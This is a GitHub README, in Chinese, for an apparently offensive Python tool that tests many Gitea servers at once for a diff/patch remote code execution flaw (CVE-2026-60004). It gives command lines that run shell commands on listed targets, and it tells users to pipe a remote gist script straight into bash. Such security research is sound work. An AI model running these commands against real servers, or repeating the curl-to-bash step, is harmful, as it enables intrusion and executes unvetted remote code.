HORKimhab/CVE-2026-60004

GitHub: HORKimhab/CVE-2026-60004

Gitea diff/patch 远程代码执行漏洞(CVE-2026-60004)的 Python 批量 PoC 验证工具。

Stars: 0 | Forks: 0

# CVE-2026-60004 更多信息:https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m ## ⚡ 简易使用方法 仅在以下安全且经授权的环境中使用本项目: - 本地虚拟机 - Docker 容器 - 隔离的实验室环境 - 经授权的渗透测试环境 设置示例: ``` git clone cd # 项目使用 python 遵循以下步骤 # 创建虚拟环境 python -m venv venv # 激活虚拟环境 # macOS / Linux source venv/bin/activate # Windows (Git Bash / WSL) source venv/Scripts/activate # 安装 requirments pip install -r requirements.txt ``` 使用示例: ``` # 1. 省略行的可选全局密码 export GITEA_PASSWORD='defaultpass' # 2. 运行(先执行安全模式) python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run # 3. 使用 3 个 worker 进行实际运行 python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3 # 4. 经典单目标仍然有效 python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id' ``` 注意: - 如果从其他项目克隆,您必须运行 `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` 来清除嵌套的 .git 目录 - 例如:cve-2025-46822.sh, cve-2025-46822-lab.sh, ... # 📚 教育性安全研究仓库 一个用于在受控环境中学习、测试和研究网络安全概念的仓库。 ## ⚠️ 安全与法律免责声明 ## 目的 本仓库仅供**教育和经授权的安全研究使用**。 旨在帮助用户学习: - 安全漏洞 - 沙箱和隔离概念 - 安全编码和防御实践 ## 仅限授权使用 仅在您已获得权限的环境中使用本仓库,例如: - 个人实验室或虚拟机 - Docker 或隔离环境 - 经授权的渗透测试 - 网络安全培训或学术研究 严禁未经授权或非法使用。 ## 免责声明 作者和贡献者对本项目造成的任何损害、滥用、法律问题或损失**概不负责**。 使用本仓库即表示您同意: - 您对自己的行为负责 - 您将合法且符合道德地使用它 - 本项目按“原样”提供,**不提供任何担保** ## 道德使用 本项目旨在用于: - 防御性安全研究 - 网络安全教育 - 漏洞防范意识 - 安全系统和软件研究 请遵循负责任的漏洞披露原则,并遵守所有适用的法律。 ## 联系方式 如需进行负责任的漏洞披露或合作,请通过 GitHub 联系仓库维护者。
标签:CISA项目, CVE-2026-60004, Gitea, Python, 无后门, 逆向工具